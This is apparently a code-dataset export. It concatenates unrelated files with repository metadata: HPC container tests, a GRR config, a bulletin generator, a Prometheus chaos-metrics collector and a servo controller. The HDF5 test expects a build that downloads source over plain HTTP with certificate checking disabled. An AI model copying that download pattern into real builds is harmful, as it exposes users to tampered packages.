mkdir -p /var/tmp && tar -x -f /var/tmp/hdf5-1.10.6.tar.bz2 -C /var/tmp -j && \
cd /var/tmp/hdf5-1.10.6 && ./configure --prefix=/usr/local/hdf5 --enable-cxx --enable-fortran && \
make -j$(nproc) && \
make -j$(nproc) install && \
rm -rf /var/tmp/hdf5-1.10.6 /var/tmp/hdf5-1.10.6.tar.bz2
ENV CPATH=/usr/local/hdf5/include:$CPATH \
HDF5_DIR=/usr/local/hdf5 \
LD_LIBRARY_PATH=/usr/local/hdf5/lib:$LD_LIBRARY_PATH \
LIBRARY_PATH=/usr/local/hdf5/lib:$LIBRARY_PATH \
PATH=/usr/local/hdf5/bin:$PATH''')
@ubuntu
@docker
def test_ldconfig(self):
"""ldconfig option"""
h = hdf5(ldconfig=True, version='1.10.4')
self.assertEqual(str(h),
r'''# HDF5 version 1.10.4
RUN apt-get update -y && \
DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
bzip2 \
file \
make \
wget \
zlib1g-dev && \
rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp http://www.hdfgroup.org/ftp/HDF5/releases/hdf5-1.10/hdf5-1.10.4/src/hdf5-1.10.4.tar.bz2 && \
mkdir -p /var/tmp && tar -x -f /var/tmp/hdf5-1.10.4.tar.bz2 -C /var/tmp -j && \
cd /var/tmp/hdf5-1.10.4 && ./configure --prefix=/usr/local/hdf5 --enable-cxx --enable-fortran && \
make -j$(nproc) && \
make -j$(nproc) install && \
echo "/usr/local/hdf5/lib" >> /etc/ld.so.conf.d/hpccm.conf && ldconfig && \
rm -rf /var/tmp/hdf5-1.10.4 /var/tmp/hdf5-1.10.4.tar.bz2
ENV CPATH=/usr/local/hdf5/include:$CPATH \
HDF5_DIR=/usr/local/hdf5 \
LIBRARY_PATH=/usr/local/hdf5/lib:$LIBRARY_PATH \
PATH=/usr/local/hdf5/bin:$PATH''')
@ubuntu
@docker
def test_runtime(self):
"""Runtime"""
h = hdf5()
r = h.runtime()
self.assertEqual(r,
r'''# HDF5
RUN apt-get update -y && \
DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
zlib1g && \
rm -rf /var/lib/apt/lists/*
COPY --from=0 /usr/local/hdf5 /usr/local/hdf5
ENV CPATH=/usr/local/hdf5/include:$CPATH \
HDF5_DIR=/usr/local/hdf5 \
LD_LIBRARY_PATH=/usr/local/hdf5/lib:$LD_LIBRARY_PATH \
LIBRARY_PATH=/usr/local/hdf5/lib:$LIBRARY_PATH \
PATH=/usr/local/hdf5/bin:$PATH''')
| 37.393939 | 164 | 0.640194 | 772 | 4,936 | 4.034974 | 0.238342 | 0.024077 | 0.096308 | 0.030819 | 0.633066 | 0.633066 | 0.624077 | 0.61862 | 0.613804 | 0.602889 | 0 | 0.047343 | 0.195502 | 4,936 | 131 | 165 | 37.679389 | 0.737094 | 0.167747 | 0 | 0.5 | 0 | 0 | 0.006985 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.147059 | false | 0 | 0.176471 | 0 | 0.352941 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce6e3c09a2e66420e8e9c581cff7e8f8d2db23fe | 2,282 | py | Python | config/test.py | nahidupa/grr | 100a9d85ef2abb234e12e3ac2623caffb4116be7 | [
"Apache-2.0"
] | 1 | 2016-02-13T15:40:20.000Z | 2016-02-13T15:40:20.000Z | config/test.py | nahidupa/grr | 100a9d85ef2abb234e12e3ac2623caffb4116be7 | [
"Apache-2.0"
] | 3 | 2020-02-11T22:29:15.000Z | 2021-06-10T17:44:31.000Z | config/test.py | nahidupa/grr | 100a9d85ef2abb234e12e3ac2623caffb4116be7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Configuration parameters for the test subsystem."""
import os
from grr.lib import config_lib
# Default for running in the current directory
config_lib.DEFINE_constant_string(
"Test.srcdir",
os.path.normpath(os.path.dirname(__file__) + "/../.."),
"The directory containing the source code.")
config_lib.DEFINE_constant_string(
"Test.data_dir",
default="%(Test.srcdir)/grr/test_data",
help="The directory where test data exist.")
config_lib.DEFINE_constant_string(
"Test.config",
default="%(Test.srcdir)/grr/config/grr-server.yaml",
help="The path where the test configuration file exists.")
config_lib.DEFINE_constant_string(
"Test.additional_test_config",
default="%(Test.data_dir)/localtest.yaml",
help="The path to a test config with local customizations.")
config_lib.DEFINE_string("Test.tmpdir", "/tmp/",
help="Somewhere to write temporary files.")
config_lib.DEFINE_string("Test.data_store", "FakeDataStore",
"The data store to run the tests against.")
config_lib.DEFINE_integer("Test.remote_pdb_port", 2525,
"Remote debugger port.")
config_lib.DEFINE_list("Test.end_to_end_client_ids", [],
"List of client ids to perform regular end_to_end tests"
" on. These clients should be always on and connected"
" to the network.")
config_lib.DEFINE_list("Test.end_to_end_client_hostnames", [],
"List of hostnames to perform regular end_to_end tests"
" on. These clients should be always on and connected"
" to the network.")
config_lib.DEFINE_string("Test.end_to_end_result_check_wait", "50m",
"rdfvalue.Duration string that determines how long we "
"wait after starting the endtoend test hunt before we "
"check the results. Should be long enough that all "
"clients will have picked up the hunt, but not so "
"long that the flow gets timed out.")
config_lib.DEFINE_string("PrivateKeys.ca_key_raw_data", "",
"For testing purposes.")
| 40.75 | 80 | 0.633655 | 288 | 2,282 | 4.815972 | 0.40625 | 0.077866 | 0.118962 | 0.06633 | 0.322278 | 0.279019 | 0.18385 | 0.18385 | 0.18385 | 0.141312 | 0 | 0.003599 | 0.2695 | 2,282 | 55 | 81 | 41.490909 | 0.828434 | 0.049956 | 0 | 0.2 | 0 | 0 | 0.524537 | 0.113426 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce70b641f16acd29f6ec6fd771bef13d60610bff | 235 | py | Python | zad1_6.py | kamilhabrych/python-semestr5-lista1 | 65faeffe83bcc4706b2818e2e7802d986b19244b | [
"MIT"
] | null | null | null | zad1_6.py | kamilhabrych/python-semestr5-lista1 | 65faeffe83bcc4706b2818e2e7802d986b19244b | [
"MIT"
] | null | null | null | zad1_6.py | kamilhabrych/python-semestr5-lista1 | 65faeffe83bcc4706b2818e2e7802d986b19244b | [
"MIT"
] | null | null | null | x = int(input('Podaj pierwsza liczbe calkowita: '))
y = int(input('Podaj druga liczbe calkowita: '))
z = int(input('Podaj trzecia liczbe calkowita: '))
print()
if x > 10:
print(x)
if y > 10:
print(y)
if z > 10:
print(z) | 16.785714 | 51 | 0.617021 | 37 | 235 | 3.918919 | 0.378378 | 0.165517 | 0.268966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032787 | 0.221277 | 235 | 14 | 52 | 16.785714 | 0.759563 | 0 | 0 | 0 | 0 | 0 | 0.402542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce70fc922ee9bc7104f6b739b1a14c96b849d90a | 6,194 | py | Python | modules/bulletinGenerator_Kingsgrove.py | featherbear/swec-elvanto-automation | 7f330ca5a87623ca452170efb4845814a4fbc2ad | [
"MIT"
] | null | null | null | modules/bulletinGenerator_Kingsgrove.py | featherbear/swec-elvanto-automation | 7f330ca5a87623ca452170efb4845814a4fbc2ad | [
"MIT"
] | null | null | null | modules/bulletinGenerator_Kingsgrove.py | featherbear/swec-elvanto-automation | 7f330ca5a87623ca452170efb4845814a4fbc2ad | [
"MIT"
] | null | null | null | from mailmerge import MailMerge
import re
import os.path
from ElvantoAPIExtensions import Enums, Helpers
from modules.__stub__ import ModuleStub
class Module(ModuleStub):
__VERSION__ = "1.0"
__NAME__ = "bulletinGenerator_Kingsgrove"
# __executeTime__ = "16:00"
# __executeDay__ = "thursday"
settings = {
"general": {
"template": "",
"serviceName": "",
"pastorName": "",
"pastorTelephone": "",
"pastorEmail": "",
},
}
def validate(self):
self._baseFolder = os.path.join("files", self.__NAME__)
_templateFile = os.path.join(self._baseFolder, self.settings["general"]["template"])
if not os.path.isfile(_templateFile):
raise self.ModuleException("Invalid template file path")
self._templateFile = _templateFile
def run(self):
_serviceDate = Helpers.NextDate(Enums.Days.SUNDAY)
import math
weekNumber = int(math.ceil(_serviceDate.day / 7))
try:
thisWeekServices = Helpers.ServicesOnDate(self.conn, _serviceDate, ["volunteers", "plans"])
thisWeekService = next(
filter(lambda _: _.name == self.settings["general"]["serviceName"], thisWeekServices))
except Exception as e:
if e.__class__.__name__ == "ConnectionError":
print("Couldn't connect to Elvanto API")
return False
if type(e) == StopIteration:
print("Couldn't find an upcoming service called \"%s\"" % self.settings["general"]["serviceName"])
return False
print("An error occured:", e)
def getWeeklyConfession(week: int):
assert 1 <= week <= 5
confessionOne = """
Almighty and most merciful Father,
You have loved us with an everlasting love,
But we have gone our own way
And have rejected you in thought, word, and deed.
We are sorry for our sins
And turn away from them
For the sake of your Son who died for us,
Forgive us, cleanse us and change us.
By your Holy Spirit, enable us to live for you,
And to please you more and more;
Through Jesus Christ our Lord.
Amen.
"""
confessionTwo = """
Most merciful God,
we humbly admit that we need your help.
We confess that we have wandered from your way:
We have done wrong, and we have failed to do what is right.
You alone can save us.
Have mercy on us:
Wipe out our sins and teach us to forgive others.
Bring forth in us the fruit of the Spirit
That we may live as disciples of Christ.
This we ask in the name of Jesus our Saviour.
Amen.
"""
confessionThree = """
Heavenly Father,
We praise you for adopting us as your children
And making us heirs of eternal life.
In your mercy you have washed us from our sins
And made us clean in your sight.
Yet we still fail to love you as we should and serve you as we ought.
Forgive us our sins and renew us by your grace,
That we may continue to grow as members of Christ,
In whom alone is our salvation.
Amen.
"""
confessionFour = """
Merciful God, our maker and our judge, we have sinned against you in thought, word, and deed:
we have not loved you with our whole heart, we have not loved our neighbours as ourselves:
we repent, and are sorry for all our sins.
Father, forgive us.
Strengthen us to love and obey you in newness of life;
through Jesus Christ our Lord.
Amen
"""
confessionFive = """
Lord God,
we have sinned against you;
we have done evil in your sight.
We are sorry and repent.
Have mercy on us according to your love.
Wash away our wrongdoing and cleanse us from our sin.
Renew a right spirit within us
and restore us to the joy of your salvation,
through Jesus Christ our Lord. Amen.
"""
return [None, confessionOne, confessionTwo, confessionThree, confessionFour, confessionFive][
week].strip()
stringify = lambda volunteerArray: ", ".join(map(repr, volunteerArray))
replacements = {
"prettyDate": _serviceDate.strftime("%A, %#d %B %Y"),
"branch": self.settings["general"]["serviceName"],
"weeklyConfession": getWeeklyConfession(weekNumber),
"pastorName": self.settings["general"]["pastorName"],
"pastorTelephone": self.settings["general"]["pastorTelephone"],
"pastorEmail": self.settings["general"]["pastorEmail"],
"scripturePassage": None,
"sermonPassage": None,
"speaker": None,
}
map(print, thisWeekService.plan)
scripturePassageItem = next(filter(lambda _: _.title.startswith("Bible Reading") and not _.title.startswith("Bible Reading (Sermon)"), thisWeekService.plan))
_scripturePassageItem = re.search('^Bible Reading (?:- )?(.*)$', scripturePassageItem.title)
if _scripturePassageItem:
replacements["scripturePassage"] = _scripturePassageItem.group(1)
else:
replacements["scripturePassage"] = re.sub('<.*?>', "", scripturePassageItem.description).strip()
# Details in the title
sermonPassageItem = next(filter(lambda _: _.title.startswith("Bible Reading (Sermon"), thisWeekService.plan))
replacements["sermonPassage"] = re.sub('<.*?>', "", sermonPassageItem.description).strip()
replacements["speaker"] = stringify(thisWeekService.volunteers.byPositionName("Speaker"))
with MailMerge(self._templateFile) as document:
document.merge(**replacements)
filePath = os.path.join(self._baseFolder, "SWEC %s - Bulletin %s.docx"
% (self.settings["general"]["serviceName"], _serviceDate.strftime("%#d %B %Y")))
document.write(filePath)
| 41.293333 | 165 | 0.610268 | 685 | 6,194 | 5.436496 | 0.394161 | 0.036251 | 0.040816 | 0.032223 | 0.104458 | 0.080559 | 0.057197 | 0 | 0 | 0 | 0 | 0.002292 | 0.295609 | 6,194 | 149 | 166 | 41.57047 | 0.851249 | 0.011947 | 0 | 0.077519 | 0 | 0.007752 | 0.484303 | 0.004578 | 0 | 0 | 0 | 0 | 0.007752 | 1 | 0.023256 | false | 0.069767 | 0.046512 | 0 | 0.124031 | 0.031008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ce78d29afc746e1513a1eb1206ac1f0e6d11d03c | 3,791 | py | Python | powerfulseal/metriccollectors/prometheus_collector.py | snehalbiche/powerfulseal | 4ab70e0db8f33bd390d87e65c662774991483726 | [
"Apache-2.0"
] | 1 | 2018-07-12T22:04:51.000Z | 2018-07-12T22:04:51.000Z | powerfulseal/metriccollectors/prometheus_collector.py | kz/powerfulseal | 24276dd670777a72fed1780539ffe03f3bea63b9 | [
"Apache-2.0"
] | null | null | null | powerfulseal/metriccollectors/prometheus_collector.py | kz/powerfulseal | 24276dd670777a72fed1780539ffe03f3bea63b9 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from prometheus_client import Counter
from powerfulseal.metriccollectors import AbstractCollector
from powerfulseal.metriccollectors.collector import NODE_SOURCE, POD_SOURCE
STATUS_SUCCESS = 'success'
STATUS_FAILURE = 'failure'
# Define Prometheus metrics to be stored in the default registry
POD_KILLS_METRIC_NAME = 'seal_pod_kills_total'
POD_KILLS = Counter(POD_KILLS_METRIC_NAME,
'Number of pods killed (including failures)',
['status', 'namespace', 'name'])
NODE_STOPS_METRIC_NAME = 'seal_nodes_stopped_total'
NODE_STOPS = Counter(NODE_STOPS_METRIC_NAME,
'Number of nodes stopped (including failures)',
['status', 'uid', 'name'])
EXECUTE_FAILED_METRIC_NAME = 'seal_execute_failed_total'
EXECUTE_FAILURES = Counter(EXECUTE_FAILED_METRIC_NAME,
'Increasing counter for command execution failures',
['uid', 'name'])
FILTERED_TO_EMPTY_SET_METRIC_NAME = 'seal_empty_filter_total'
FILTERED_TO_EMPTY_SET = Counter(FILTERED_TO_EMPTY_SET_METRIC_NAME,
'Increasing counter for cases where filtering '
'returns an empty result')
PROBABILITY_FILTER_NOT_PASSED_METRIC_NAME = 'seal_probability_filter_not_passed_total'
PROBABILITY_FILTER_NOT_PASSED = Counter(PROBABILITY_FILTER_NOT_PASSED_METRIC_NAME,
'Increasing counter for cases where the'
' probability filter does not pass any '
'nodes')
MATCHED_TO_EMPTY_SET_METRIC_NAME = 'seal_empty_match_total'
MATCHED_TO_EMPTY_SET = Counter(MATCHED_TO_EMPTY_SET_METRIC_NAME,
'Increasing counter for cases where matching '
'returns an empty result',
['source'])
class PrometheusCollector(AbstractCollector):
def __init__(self):
# Export 0 for time series metrics which have labels which can have default
# values filled to avoid missing metrics. The Prometheus Python library
# already exports 0 for metrics which do not have any labels.
MATCHED_TO_EMPTY_SET.labels(NODE_SOURCE).inc(0)
MATCHED_TO_EMPTY_SET.labels(POD_SOURCE).inc(0)
def add_pod_killed_metric(self, pod):
POD_KILLS.labels(STATUS_SUCCESS, pod.namespace, pod.name).inc()
def add_pod_kill_failed_metric(self, pod):
POD_KILLS.labels(STATUS_FAILURE, pod.namespace, pod.name).inc()
def add_node_stopped_metric(self, node):
NODE_STOPS.labels(STATUS_SUCCESS, node.uid, node.name).inc()
def add_node_stop_failed_metric(self, node):
NODE_STOPS.labels(STATUS_FAILURE, node.uid, node.name).inc()
def add_execute_failed_metric(self, node):
EXECUTE_FAILURES.labels(node.uid, node.name).inc()
def add_filtered_to_empty_set_metric(self):
FILTERED_TO_EMPTY_SET.inc()
def add_probability_filter_passed_no_nodes_filter(self):
PROBABILITY_FILTER_NOT_PASSED.inc()
def add_matched_to_empty_set_metric(self, source):
MATCHED_TO_EMPTY_SET.labels(source).inc()
| 42.595506 | 86 | 0.69665 | 483 | 3,791 | 5.161491 | 0.306418 | 0.048135 | 0.048135 | 0.047734 | 0.287204 | 0.222222 | 0.185319 | 0.040112 | 0.040112 | 0.040112 | 0 | 0.004129 | 0.233448 | 3,791 | 88 | 87 | 43.079545 | 0.853751 | 0.217884 | 0 | 0 | 0 | 0 | 0.191381 | 0.04547 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0.098039 | 0.058824 | 0 | 0.254902 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
ce7dcfa1ba0e4b637228e061f83bafab463cb61b | 766 | py | Python | servoblst.py | ForToffee/MeArm | 90fdd94fd96b53b3579c6d8132e8586188e3d344 | [
"MIT"
] | 1 | 2016-04-04T17:39:54.000Z | 2016-04-04T17:39:54.000Z | servoblst.py | ForToffee/MeArm | 90fdd94fd96b53b3579c6d8132e8586188e3d344 | [
"MIT"
] | null | null | null | servoblst.py | ForToffee/MeArm | 90fdd94fd96b53b3579c6d8132e8586188e3d344 | [
"MIT"
] | null | null | null | import time
import os
servos = {}
class ServoController:
def __init__(self):
os.system('sudo /home/pi/PiBits/ServoBlaster/user/servod')
def setAngle(self, servo_id, degrees):
if degrees > 90:
degrees = 90
elif degrees < -90:
degrees = -90
#http://www.raspberrypi.org/forums/viewtopic.php?f=44&t=36572
pulse = 1520 + (degrees * 400) / 45
os.system("echo %d=%d > /dev/servoblaster" % (servo_id, pulse/10))
time.sleep(0.1)
servos[servo_id] = degrees
#print "angle=%s pulse=%s" % (degrees, pulse)
return servos[servo_id]
def incAngle(self, servo_id, increment):
angle = servos.get(servo_id, 0)
return self.setAngle(servo_id, angle + increment)
def clean_up(self):
print "cleaning up"
os.system('sudo killall servod')
| 22.529412 | 68 | 0.680157 | 112 | 766 | 4.544643 | 0.508929 | 0.096267 | 0.047151 | 0.070727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045886 | 0.174935 | 766 | 33 | 69 | 23.212121 | 0.759494 | 0.13577 | 0 | 0 | 0 | 0 | 0.159091 | 0.060606 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce815d6c526703afd41758b750594101532e6d14 | 724 | py | Python | warmup/sock_merchant.py | franloza/hackerrank | e66f5f5c4c1c7c0fe93146d29140692cd71625b7 | [
"MIT"
] | null | null | null | warmup/sock_merchant.py | franloza/hackerrank | e66f5f5c4c1c7c0fe93146d29140692cd71625b7 | [
"MIT"
] | null | null | null | warmup/sock_merchant.py | franloza/hackerrank | e66f5f5c4c1c7c0fe93146d29140692cd71625b7 | [
"MIT"
] | null | null | null | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the sockMerchant function below.
def sockMerchant(n, ar):
socks = {}
for elem in ar:
if elem in socks:
socks[elem] += 1
else:
socks[elem] = 1
return sum(elem // 2 for elem in socks.values())
# Read from input
# if __name__ == '__main__':
# fptr = open(os.environ['OUTPUT_PATH'], 'w')
#
# n = int(input())
#
# ar = list(map(int, input().rstrip().split()))
#
# result = sockMerchant(n, ar)
#
# fptr.write(str(result) + '\n')
#
# fptr.close()
# Toy case
if __name__ == '__main__':
n, ar = 9, [10, 20, 20, 10, 10, 30, 50, 10, 20]
print(sockMerchant(n, ar))
| 19.567568 | 52 | 0.56768 | 101 | 724 | 3.90099 | 0.544554 | 0.030457 | 0.114213 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0.269337 | 724 | 36 | 53 | 20.111111 | 0.701323 | 0.429558 | 0 | 0 | 0 | 0 | 0.020151 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.3125 | 0 | 0.4375 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
ce882279c49c7c6dbe430df86a631892b7154111 | 3,342 | py | Python | tests/zzz_deprecated_unmaintained/obsmodel/TestZeroMeanGaussLocalStepSpeed.py | HongminWu/bnpy | 04c918cc1150ca8d9694c093633d539d9286a1b6 | [
"BSD-3-Clause"
] | 3 | 2018-07-02T03:50:23.000Z | 2019-05-16T03:23:55.000Z | tests/zzz_deprecated_unmaintained/obsmodel/TestZeroMeanGaussLocalStepSpeed.py | HongminWu/bnpy | 04c918cc1150ca8d9694c093633d539d9286a1b6 | [
"BSD-3-Clause"
] | 1 | 2021-01-07T01:33:06.000Z | 2021-01-07T01:33:06.000Z | tests/zzz_deprecated_unmaintained/obsmodel/TestZeroMeanGaussLocalStepSpeed.py | birlrobotics/bnpy | 8f297d8f3e4a56088d7755134c329f63a550be9e | [
"BSD-3-Clause"
] | 1 | 2020-09-01T13:21:18.000Z | 2020-09-01T13:21:18.000Z | import numpy as np
import scipy.linalg
import argparse
import time
from contextlib import contextmanager
def measureTime(f, nTrial=3):
def f_timer(*args, **kwargs):
times = list()
for rep in range(nTrial):
start = time.time()
result = f(*args, **kwargs)
end = time.time()
times.append(end-start)
if rep == 0:
print "trial %2d/%2d: %.3f sec %s" % (
rep+1, nTrial, times[-1], f.__name__)
else:
print "trial %2d/%2d: %.3f sec" % (
rep+1, nTrial, times[-1])
print "mean of %2d: %.3f sec" % (
nTrial, np.mean(times))
print "median of %2d: %.3f sec" % (
nTrial, np.median(times))
print ''
return result
return f_timer
@measureTime
def mahalDist_np_solve(X=None, B=None, cholB=None):
''' Compute mahalanobis the old fashioned way.
'''
if B is not None:
cholB = np.linalg.cholesky(B)
Q = np.linalg.solve(cholB, X.T)
return Q
@measureTime
def mahalDist_scipy_solve(X=None, B=None, cholB=None):
''' Compute mahalanobis the old fashioned way.
'''
if B is not None:
cholB = np.linalg.cholesky(B)
Q = scipy.linalg.solve(cholB, X.T)
return Q
@measureTime
def mahalDist_scipy_solve_triangular(X=None, B=None, cholB=None):
''' Compute mahalanobis with triangular method
'''
if B is not None:
cholB = np.linalg.cholesky(B)
Q = scipy.linalg.solve_triangular(cholB, X.T, lower=True)
return Q
@measureTime
def mahalDist_scipy_solve_triangular_nocheck(
X=None, B=None, cholB=None):
''' Compute mahalanobis with triangular method
'''
if B is not None:
cholB = np.linalg.cholesky(B)
Q = scipy.linalg.solve_triangular(
cholB, X.T, lower=True, check_finite=False)
return Q
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--N', type=int, default=1e5)
parser.add_argument('--D', type=int, default=64)
args = parser.parse_args()
N = args.N
D = args.D
print "TIMING TEST: N=%d D=%d" % (N, D)
X = np.random.randn(N, D)
R = np.random.randn(D, D)
B = np.dot(R.T, R) + np.eye(D, D)
cholB = np.linalg.cholesky(B)
mahalDist_np_solve(X=X, cholB=cholB)
mahalDist_scipy_solve(X=X, cholB=cholB)
mahalDist_scipy_solve_triangular(X=X, cholB=cholB)
mahalDist_scipy_solve_triangular_nocheck(X=X, cholB=cholB)
"""
In [41]: Qs = scipy.linalg.solve_triangular(cholB, X.T, lower=True, check_finite=False)
In [42]: %timeit -n1 -r1 Q = scipy.linalg.solve_triangular(cholB, X.T, lower=True, check_finite=False)
1 loops, best of 1: 625 ms per loop
In [43]: %timeit -n1 -r1 Q = scipy.linalg.solve_triangular(cholB, X.T, lower=True, check_finite=False)
1 loops, best of 1: 623 ms per loop
In [44]: %timeit -n1 -r1 Q = scipy.linalg.solve_triangular(cholB, X.T, lower=True)
1 loops, best of 1: 790 ms per loop
In [45]: %timeit -n1 -r1 Q = scipy.linalg.solve_triangular(cholB, X.T, lower=True)
1 loops, best of 1: 799 ms per loop
In [46]: %timeit -n1 -r1 Q = scipy.linalg.solve(cholB, X.T)
1 loops, best of 1: 1.26 s per loop
In [47]: %timeit -n1 -r1 Q = scipy.linalg.solve(cholB, X.T)
1 loops, best of 1: 1.26 s per loop
"""
| 30.66055 | 102 | 0.620586 | 515 | 3,342 | 3.930097 | 0.215534 | 0.059783 | 0.038043 | 0.075593 | 0.681324 | 0.654644 | 0.61166 | 0.61166 | 0.523715 | 0.523715 | 0 | 0.030123 | 0.245063 | 3,342 | 108 | 103 | 30.944444 | 0.772097 | 0 | 0 | 0.25 | 0 | 0 | 0.057427 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.073529 | null | null | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce8f967c1a3e2320cb9057b9e55d32dfed9aae91 | 2,019 | py | Python | app/python/query_strings.py | ProfessorUdGuru/toykinter | 66c0a9877df6b4b3034125566e687b7361085d2b | [
"Unlicense"
] | null | null | null | app/python/query_strings.py | ProfessorUdGuru/toykinter | 66c0a9877df6b4b3034125566e687b7361085d2b | [
"Unlicense"
] | null | null | null | app/python/query_strings.py | ProfessorUdGuru/toykinter | 66c0a9877df6b4b3034125566e687b7361085d2b | [
"Unlicense"
] | null | null | null | # query_strings.py
'''
Since Sqlite queries are inserted as string in Python code,
the queries can be stored here to save space in the modules
where they are used.
'''
delete_color_scheme = '''
DELETE FROM color_scheme
WHERE color_scheme_id = ?
'''
insert_color_scheme = '''
INSERT INTO color_scheme
VALUES (null, ?, ?, ?, ?, 0, 0)
'''
select_all_color_schemes = '''
SELECT bg, highlight_bg, head_bg, fg
FROM color_scheme
'''
select_all_color_schemes_plus = '''
SELECT bg, highlight_bg, head_bg, fg, built_in, color_scheme_id
FROM color_scheme
'''
select_color_scheme_current = '''
SELECT bg, highlight_bg, head_bg, fg
FROM format
WHERE format_id = 1
'''
select_current_database = '''
SELECT current_database
FROM closing_state
WHERE closing_state_id = 1
'''
select_font_scheme = '''
SELECT font_size, output_font, input_font
FROM format
WHERE format_id = 1
'''
select_opening_settings = '''
SELECT
bg,
highlight_bg,
head_bg,
fg,
output_font,
input_font,
font_size,
default_bg,
default_highlight_bg,
default_head_bg,
default_fg,
default_output_font,
default_input_font,
default_font_size
FROM format
WHERE format_id = 1
'''
update_color_scheme_null = '''
UPDATE format
SET (bg, highlight_bg, head_bg, fg) =
(null, null, null, null)
WHERE format_id = 1
'''
update_current_database = '''
UPDATE closing_state
SET current_database = ?
WHERE closing_state_id = 1
'''
update_format_color_scheme = '''
UPDATE format
SET (bg, highlight_bg, head_bg, fg) = (?, ?, ?, ?)
WHERE format_id = 1
'''
update_format_fonts = '''
UPDATE format
SET (font_size, output_font, input_font) = (?, ?, ?)
WHERE format_id = 1
'''
| 20.393939 | 69 | 0.595344 | 241 | 2,019 | 4.626556 | 0.248963 | 0.10852 | 0.069955 | 0.09148 | 0.365919 | 0.288789 | 0.218834 | 0.120179 | 0.064574 | 0 | 0 | 0.007225 | 0.314512 | 2,019 | 98 | 70 | 20.602041 | 0.79841 | 0.078257 | 0 | 0.422535 | 0 | 0 | 0.765043 | 0.012034 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce90ad08ae1e89a4b497c7dcbd24f5d92a0ba879 | 428 | py | Python | travel/migrations/0029_auto_20190514_2108.py | sausage-team/travel-notes | 3c2454ebad7764906c5ff30cbdfe296cb7c64eb4 | [
"MIT"
